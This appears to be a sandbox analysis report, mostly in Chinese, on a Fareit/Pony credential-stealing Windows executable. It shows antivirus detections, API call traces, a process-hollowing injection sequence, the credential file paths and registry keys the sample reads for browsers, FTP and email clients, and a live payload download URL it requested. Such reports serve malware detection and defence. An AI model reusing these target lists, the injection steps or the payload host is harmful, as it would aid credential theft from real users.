10.4
0-day

9026e9b714998846a26087ed7f5a276b1399204a1e34d469571a7301ce720931

d679a70dec977d6f4687ce5c4a086e7f.exe

分析耗时

77s

最近分析

文件大小

724.5KB
静态报毒 动态报毒 AI SCORE=99 AIDETECTVM ALI2000015 AUTOG CLOUD CONFIDENCE DELF DELFINJECT DELPHILESS ELDORADO EMVU EMZL FAREIT GENERICIH HIGH CONFIDENCE HQGCEL KRYPTIK MALWARE2 PONY PWSX QUASAR RATNET RNKBEND S15413981 SCORE SUSPICIOUS PE SVTPK TGW@A4L3ICMI TSCOPE UNCLASSIFIEDMALWARE@0 UNSAFE VSNTH320 X2091 ZELPHIF ZUSY 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:PWSX-gen [Trj] 20200821 18.4.3895.0
Tencent 20200821 1.0.0.1
Kingsoft 20200821 2013.8.14.323
McAfee Fareit-FPQ!D679A70DEC97 20200821 6.0.6.653
静态指标
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features HTTP version 1.0 used suspicious_request GET http://kboyud.com/io/panel/shit.exe
Performs some HTTP requests (1 个事件)
request GET http://kboyud.com/io/panel/shit.exe
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619910852.856176
NtAllocateVirtualMemory
process_identifier: 368
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619910853.216176
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 73728
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00476000
success 0 0
1619910853.216176
NtAllocateVirtualMemory
process_identifier: 368
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x007b0000
success 0 0
Steals private information from local Internet browsers (5 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Web Data
registry HKEY_CURRENT_USER\Software\Opera Software
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.168170655905427 section {'size_of_data': '0x00021000', 'virtual_address': '0x0009a000', 'entropy': 7.168170655905427, 'name': '.rsrc', 'virtual_size': '0x00020eb8'} description A section with a high entropy has been found
Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 个事件)
Time & API Arguments Status Return Repeated
1619937531.312125
LookupPrivilegeValueW
system_name:
privilege_name: SeTcbPrivilege
success 1 0
1619937531.312125
LookupPrivilegeValueW
system_name:
privilege_name: SeCreateTokenPrivilege
success 1 0
1619937531.312125
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619937531.312125
LookupPrivilegeValueW
system_name:
privilege_name: SeRestorePrivilege
success 1 0
1619937531.328125
LookupPrivilegeValueW
system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
success 1 0
Queries for potentially installed applications (36 个事件)
Time & API Arguments Status Return Repeated
1619937531.328125
RegOpenKeyExA
access: 0x02000000
base_handle: 0x80000002
key_handle: 0x00000134
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
options: 0
success 0 0
1619937531.328125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
options: 0
success 0 0
1619937531.343125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
options: 0
success 0 0
1619937531.359125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
options: 0
success 0 0
1619937531.375125
RegOpenKeyExA
access: 0x00020019
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
options: 0
success 0 0
1619937531.375125
RegOpenKeyExA
access: 0x00020219
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
options: 0
success 0 0
1619937531.375125
RegOpenKeyExA
access: 0x00020119
base_handle: 0x80000002
key_handle: 0x00000138
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
options: 0
success 0 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (50 out of 120 个事件)
file C:\Program Files (x86)\CuteFTP\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\CuteFTP\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\CuteFTP\sm.dat
file C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
file C:\ProgramData\CuteFTP\sm.dat
file C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
file C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
file C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
file C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
file C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\3\History.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\3\History.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\4\Sites.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\4\Sites.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\4\History.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\4\Quick.dat
file C:\ProgramData\FlashFXP\3\History.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\4\Quick.dat
file C:\ProgramData\FlashFXP\4\History.dat
file C:\ProgramData\FlashFXP\3\Sites.dat
file C:\ProgramData\FlashFXP\4\Quick.dat
file C:\ProgramData\FlashFXP\4\Sites.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\3\Sites.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\3\Quick.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\3\Quick.dat
file C:\ProgramData\FlashFXP\3\Quick.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FlashFXP\3\Sites.dat
file C:\Users\Administrator.Oskar-PC\AppData\Local\FlashFXP\4\History.dat
file C:\ProgramData\GHISLER\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Local\GHISLER\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
file C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
file C:\Users\Administrator.Oskar-PC\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
file C:\Users\Administrator.Oskar-PC\AppData\Local\CoffeeCup Software\SharedSettings.ccs
file C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
file C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
file C:\Users\Administrator.Oskar-PC\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
Collects information about installed applications (1 个事件)
Time & API Arguments Status Return Repeated
1619937531.343125
RegQueryValueExA
key_handle: 0x00000138
value: Google Chrome
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
success 0 0
Harvests credentials from local email clients (7 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Mail\Salt
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
registry HKEY_LOCAL_MACHINE\Software\RimArts\B2\Settings
registry HKEY_CURRENT_USER\Software\Poco Systems Inc
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 368 called NtSetContextThread to modify thread in remote process 784
Time & API Arguments Status Return Repeated
1619910853.450176
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4261409
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 784
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 368 resumed a thread in remote process 784
Time & API Arguments Status Return Repeated
1619910853.684176
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 784
success 0 0
Generates some ICMP traffic
Executed a process and injected code into it, probably while unpacking (6 个事件)
Time & API Arguments Status Return Repeated
1619910853.450176
CreateProcessInternalW
thread_identifier: 732
thread_handle: 0x000000f8
process_identifier: 784
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\d679a70dec977d6f4687ce5c4a086e7f.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x000000fc
inherit_handles: 0
success 1 0
1619910853.450176
NtUnmapViewOfSection
process_identifier: 784
region_size: 4096
process_handle: 0x000000fc
base_address: 0x00400000
success 0 0
1619910853.450176
NtMapViewOfSection
section_handle: 0x00000104
process_identifier: 784
commit_size: 102400
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x000000fc
allocation_type: 0 ()
section_offset: 0
view_size: 102400
base_address: 0x00400000
success 0 0
1619910853.450176
NtGetContextThread
thread_handle: 0x000000f8
success 0 0
1619910853.450176
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4261409
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 784
success 0 0
1619910853.684176
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 784
success 0 0
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.310547
FireEye Generic.mg.d679a70dec977d6f
CAT-QuickHeal Trojan.GenericIH.S15413981
ALYac Spyware.Pony
Cylance Unsafe
Zillya Trojan.Injector.Win32.756877
Sangfor Malware
K7AntiVirus Trojan ( 0056bdab1 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Trojan ( 0056bdab1 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Zusy.D4BD13
TrendMicro TROJ_FRS.VSNTH320
Cyren W32/Delf.LI.gen!Eldorado
Symantec Trojan.Gen.2
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Gen:Variant.Zusy.310547
NANO-Antivirus Trojan.Win32.Quasar.hqgcel
Paloalto generic.ml
ViRobot Trojan.Win32.S.Agent.741888.CO
Ad-Aware Gen:Variant.Zusy.310547
TACHYON Trojan-PWS/W32.DP-Fareit.741888.M
Comodo .UnclassifiedMalware@0
F-Secure Trojan.TR/AD.Fareit.svtpk
DrWeb BackDoor.RatNET.2
VIPRE Trojan.Win32.Generic!BT
Invincea heuristic
Sophos Troj/AutoG-IT
SentinelOne DFI - Suspicious PE
Jiangmin Trojan.Kryptik.bzt
Webroot W32.Trojan.Gen
Avira TR/AD.Fareit.svtpk
Antiy-AVL Trojan/Win32.Injector
Microsoft PWS:Win32/Fareit
AegisLab Trojan.Win32.Kryptik.4!c
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Gen:Variant.Zusy.310547
Cynet Malicious (score: 85)
AhnLab-V3 Suspicious/Win.Delphiless.X2091
Acronis suspicious
McAfee Fareit-FPQ!D679A70DEC97
MAX malware (ai score=99)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack.DLF
ESET-NOD32 a variant of Win32/Injector.EMVU
TrendMicro-HouseCall TROJ_FRS.VSNTH320
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x48c164 VirtualFree
0x48c168 VirtualAlloc
0x48c16c LocalFree
0x48c170 LocalAlloc
0x48c174 GetVersion
0x48c178 GetCurrentThreadId
0x48c184 VirtualQuery
0x48c188 WideCharToMultiByte
0x48c18c MultiByteToWideChar
0x48c190 lstrlenA
0x48c194 lstrcpynA
0x48c198 LoadLibraryExA
0x48c19c GetThreadLocale
0x48c1a0 GetStartupInfoA
0x48c1a4 GetProcAddress
0x48c1a8 GetModuleHandleA
0x48c1ac GetModuleFileNameA
0x48c1b0 GetLocaleInfoA
0x48c1b4 GetCommandLineA
0x48c1b8 FreeLibrary
0x48c1bc FindFirstFileA
0x48c1c0 FindClose
0x48c1c4 ExitProcess
0x48c1c8 WriteFile
0x48c1d0 RtlUnwind
0x48c1d4 RaiseException
0x48c1d8 GetStdHandle
Library user32.dll:
0x48c1e0 GetKeyboardType
0x48c1e4 LoadStringA
0x48c1e8 MessageBoxA
0x48c1ec CharNextA
Library advapi32.dll:
0x48c1f4 RegQueryValueExA
0x48c1f8 RegOpenKeyExA
0x48c1fc RegCloseKey
Library oleaut32.dll:
0x48c204 SysFreeString
0x48c208 SysReAllocStringLen
0x48c20c SysAllocStringLen
Library kernel32.dll:
0x48c214 TlsSetValue
0x48c218 TlsGetValue
0x48c21c LocalAlloc
0x48c220 GetModuleHandleA
Library advapi32.dll:
0x48c228 RegQueryValueExA
0x48c22c RegOpenKeyExA
0x48c230 RegCloseKey
Library kernel32.dll:
0x48c238 lstrcpyA
0x48c23c WriteFile
0x48c240 WaitForSingleObject
0x48c244 VirtualQuery
0x48c248 VirtualProtect
0x48c24c VirtualAlloc
0x48c250 Sleep
0x48c254 SizeofResource
0x48c258 SetThreadLocale
0x48c25c SetFilePointer
0x48c260 SetEvent
0x48c264 SetErrorMode
0x48c268 SetEndOfFile
0x48c26c ResetEvent
0x48c270 ReadFile
0x48c274 MultiByteToWideChar
0x48c278 MulDiv
0x48c27c LockResource
0x48c280 LoadResource
0x48c284 LoadLibraryA
0x48c290 GlobalUnlock
0x48c294 GlobalSize
0x48c298 GlobalReAlloc
0x48c29c GlobalHandle
0x48c2a0 GlobalLock
0x48c2a4 GlobalFree
0x48c2a8 GlobalFindAtomA
0x48c2ac GlobalDeleteAtom
0x48c2b0 GlobalAlloc
0x48c2b4 GlobalAddAtomA
0x48c2b8 GetVersionExA
0x48c2bc GetVersion
0x48c2c0 GetUserDefaultLCID
0x48c2c4 GetTickCount
0x48c2c8 GetThreadLocale
0x48c2d0 GetSystemInfo
0x48c2d4 GetStringTypeExA
0x48c2d8 GetStdHandle
0x48c2dc GetProcAddress
0x48c2e0 GetModuleHandleA
0x48c2e4 GetModuleFileNameA
0x48c2e8 GetLocaleInfoA
0x48c2ec GetLocalTime
0x48c2f0 GetLastError
0x48c2f4 GetFullPathNameA
0x48c2f8 GetDiskFreeSpaceA
0x48c2fc GetDateFormatA
0x48c300 GetCurrentThreadId
0x48c304 GetCurrentProcessId
0x48c308 GetComputerNameA
0x48c30c GetCPInfo
0x48c310 GetACP
0x48c314 FreeResource
0x48c318 InterlockedExchange
0x48c31c FreeLibrary
0x48c320 FormatMessageA
0x48c324 FindResourceA
0x48c32c EnumCalendarInfoA
0x48c338 CreateThread
0x48c33c CreateFileA
0x48c340 CreateEventA
0x48c344 CompareStringA
0x48c348 CloseHandle
Library version.dll:
0x48c350 VerQueryValueA
0x48c358 GetFileVersionInfoA
Library gdi32.dll:
0x48c360 UnrealizeObject
0x48c364 StretchBlt
0x48c368 SetWindowOrgEx
0x48c36c SetWinMetaFileBits
0x48c370 SetViewportOrgEx
0x48c374 SetTextColor
0x48c378 SetStretchBltMode
0x48c37c SetROP2
0x48c380 SetPixel
0x48c384 SetMapMode
0x48c388 SetEnhMetaFileBits
0x48c38c SetDIBColorTable
0x48c390 SetBrushOrgEx
0x48c394 SetBkMode
0x48c398 SetBkColor
0x48c39c SelectPalette
0x48c3a0 SelectObject
